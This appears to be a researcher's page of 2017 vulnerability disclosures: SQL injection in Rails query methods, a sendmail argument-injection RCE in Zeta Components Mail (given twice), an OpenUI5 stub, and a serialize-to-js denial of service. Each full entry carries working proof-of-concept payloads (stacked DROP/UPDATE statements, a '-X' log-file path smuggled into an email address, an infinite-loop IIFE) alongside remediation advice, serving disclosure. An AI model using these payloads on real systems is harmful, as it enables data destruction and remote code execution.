Kay

security researcher @MalwareBenchmark.

Ruby on Rails Arbitrary SQL Injection

Framework: Ruby on Rails

Affected Version: <= 5.1.4

Published: December 27th, 2017

Reported by: Kay

Overview

Ruby on Rails is a web application framework written in Ruby. Several issues were discovered in the Active Record Query Interface that can lead to arbitrary SQL injection. When a Rails application enables multi-statement queries on its MySQL connection (flags: [MULTI_STATEMENTS] in database.yml), SQL statements can be injected through query methods that accept a raw SQL string, such as find_by, where, order and reorder.

The SQL these methods generate from a string argument can be split with a semicolon, and everything after the semicolon is sent to the server as an additional statement. Note that where and find_by wrap a string condition in parentheses (WHERE (...)), so a payload has to close that parenthesis before the semicolon and open a new one after it to keep the statement balanced; order and reorder append the string as-is, so no parentheses are needed there.

These methods are documented to take SQL fragments, so passing untrusted strings to them is an injection risk on any database. The MULTI_STATEMENTS flag is what turns a condition-level injection into arbitrary stacked statements such as DROP or UPDATE.

It is confirmed that these vulnerabilities affect applications built on MySQL. Worse, it was verified that if a Rails application is built on Alibaba Cloud RDS for MySQL, the attack also succeeds without flags: [MULTI_STATEMENTS] being set in the Rails application.

In summary, exploitation is possible when both of these conditions are true:

  1. The Rails application is built on Alibaba Cloud RDS for MySQL, or flags: [MULTI_STATEMENTS] is set in database.yml

  2. Untrusted string input is passed to query methods like find_by, where, order, etc.

PoC

CVE-2017-17916 SQL injection in find_by method

# find the User record whose name equals Amy, then drop the users table
User.find_by("name = 'Amy'); DROP TABLE `users`;(")


CVE-2017-17917 SQL injection in where method

# find User records whose id equals 1, then delete them
User.where("id = 1); DELETE FROM `users` WHERE `users`.`id` = 1;(")


CVE-2017-17919 SQL injection in order method

# get users ordered by id desc, then set the name of the user whose id equals 2 to kay
User.order("id desc; UPDATE `users` SET `name` = 'kay' WHERE `users`.`id` = 2")


CVE-2017-17920 SQL injection in reorder method

# get users ordered by id desc, then set the name of the user whose id equals 1 to malwarebenchmark
User.reorder("id desc; UPDATE `users` SET `name` = 'malwarebenchmark' WHERE `users`.`id` = 1")


CVE-2017-15806: Remote Code Execution Vulnerability


Vendor: Zeta Components

Module: Mail, <= 1.8.1

Published: 2017/11/12

Author: Kay

CVE-2017-15806

Overview

Zeta Components is a high-quality, general-purpose application development library built on PHP 5. The project joined the Apache Incubator in May 2010 but, for various reasons, left the Apache Software Foundation in April 2012. We found an RCE (Remote Code Execution) vulnerability in the Mail library that allows arbitrary code to be executed on the server.

Details

The vulnerability is in the send function of the ezcMailMtaTransport class.

At line 73 of /src/transports/mta/mta_transport.php, send() calls PHP's mail() to deliver the message; in general, PHP uses sendmail as its default MTA. When mail() is called, its fifth parameter is $additionalParameters, which allows extra arguments to be passed to sendmail. In Mail, $additionalParameters is assigned by the following code:

$additionalParameters = "-f{$mail->returnPath->email}";

If the attacker supplies an email address like:

'kay_malwarebenchmark@outlook.com -X/var/www/html/cache/exploit.php'

and places the payload in the message body, sendmail writes its log to /var/www/html/cache/exploit.php (passing -Xlogfile to sendmail makes it write a log to logfile). The file then contains the payload from the message body, and requesting #domain#/cache/exploit.php remotely executes it.

In summary, exploitation requires all three of the following conditions:

  1. ezcMailMtaTransport is used
  2. sendmail is the MTA
  3. The ezcMailAddress is not properly escaped.

PoC

use Mail\mail;

$mail = new ezcMail();
// The Return-Path is interpolated into sendmail's -f argument unescaped, so the
// trailing " -X<path>" becomes a separate sendmail option (write a log to <path>).
$mail->returnPath = new ezcMailAddress('kay_malwarebenchmark@outlook.com -X/var/www/html/cache/exploit.php');
$mail->addTo( new ezcMailAddress('some one'));
$mail->subject = "Mail PoC Exploit";
// The -X log contains the message body, so this payload ends up inside exploit.php
$mail->body = new ezcMailText("<?php phpinfo(); ?>");
$transport = new ezcMailMtaTransport();
$transport->send($mail);

Recommendation

The vendor has released a fix; upgrade Mail to 1.8.2.

CVE-2017-15806: Critical RCE Vulnerability


Vendor: Zeta Components

module: Mail, <= 1.8.1

Published: November 12th, 2017

Reported by: Kay

CVE-2017-15806

Overview

Zeta Components is a high-quality, general-purpose library of loosely coupled components for developing applications based on PHP 5. An issue was discovered in the Mail package for Zeta Components. It is possible to exploit this vulnerability to execute arbitrary code on the remote server.

Detail

The vulnerability is in the send method of the ezcMailMtaTransport class.

At line 73 of /src/transports/mta/mta_transport.php, send() uses PHP's mail() function to deliver the message, and PHP uses sendmail as its default MTA. The fifth parameter of mail() is $additionalParameters, which passes extra command-line arguments to sendmail. As the code shows, it is assigned by this line:

$additionalParameters = "-f{$mail->returnPath->email}";

If an attacker supplies an email address like:

'kay_malwarebenchmark@outlook.com -X/var/www/html/cache/exploit.php'

and puts the payload in the mail body, sendmail writes its transaction log (-X) to /var/www/html/cache/exploit.php. The resulting file contains the payload passed in the body of the email, which can then be requested and executed via domainname/cache/exploit.php. PHP runs $additionalParameters through escapeshellcmd() internally, which neutralises shell metacharacters but not whitespace, so the address still splits into a second sendmail argument: this is an argument injection, not a shell command injection.

In summary, exploitation is possible if all of these conditions are true:

  1. you use the ezcMailMtaTransport
  2. your "sendmail" binary allows the -X flag to be set, which is not the case for exim4 and postfix, as they don't support that argument
  3. your wwwroot is writable by the user your webserver is running as
  4. the input used for the ezcMailAddress that is assigned to the returnPath property is not properly escaped

PoC

use Mail\mail;

$mail = new ezcMail();
// The Return-Path is interpolated into sendmail's -f argument unescaped, so the
// trailing " -X<path>" becomes a separate sendmail option (write a log to <path>).
$mail->returnPath = new ezcMailAddress('kay_malwarebenchmark@outlook.com -X/var/www/html/cache/exploit.php');
$mail->addTo( new ezcMailAddress('some one'));
$mail->subject = "Mail PoC Exploit";
// The -X log contains the message body, so this payload ends up inside exploit.php
$mail->body = new ezcMailText("<?php phpinfo(); ?>");
$transport = new ezcMailMtaTransport();
$transport->send($mail);

Remediation

Upgrade Mail to 1.8.2

CVE-2017-15916: RCE in OpenUI5

Framework: OpenUI5

Published: November 06th, 2017

Reported by: Kay

Overview

OpenUI5 is an open source JavaScript UI library, maintained by SAP and available under the Apache 2.0 license. OpenUI5 supports data binding to different models (JSON, XML and OData). An issue was discovered in sap.ui.support that may allow remote code execution.

PoC and details are coming soon…

CVE-2017-15871: DoS Through IIFE

Module: serialize-to-js, v1.*

Published: October 27th, 2017

Reported by: Kay

CVE-2017-15871

Overview

An issue was discovered in the serialize-to-js package v1.* for Node.js. serialize-to-js is a module for serializing an object or function into a JavaScript source string, and its deserialize() function evaluates that string to rebuild the value. Untrusted data passed into deserialize() can therefore be exploited to achieve denial of service by passing a JavaScript object containing an Immediately Invoked Function Expression (IIFE), which runs during deserialization.

PoC

var deserialize = require('serialize-to-js').deserialize;
// The IIFE is executed as soon as deserialize() evaluates the string; the loop never ends
var payload = " (function(){ while(1){ console.log('exploit') } }())";
deserialize(payload);

When deserialize(payload) is executed, console.log('exploit') runs in an endless loop, so the Node.js main thread is blocked and the process serves nothing else. DoS done.


Remediation

There is no patch yet available for this vulnerability, so we recommend not passing untrusted user input to deserialize() in network-facing applications until a patch is available.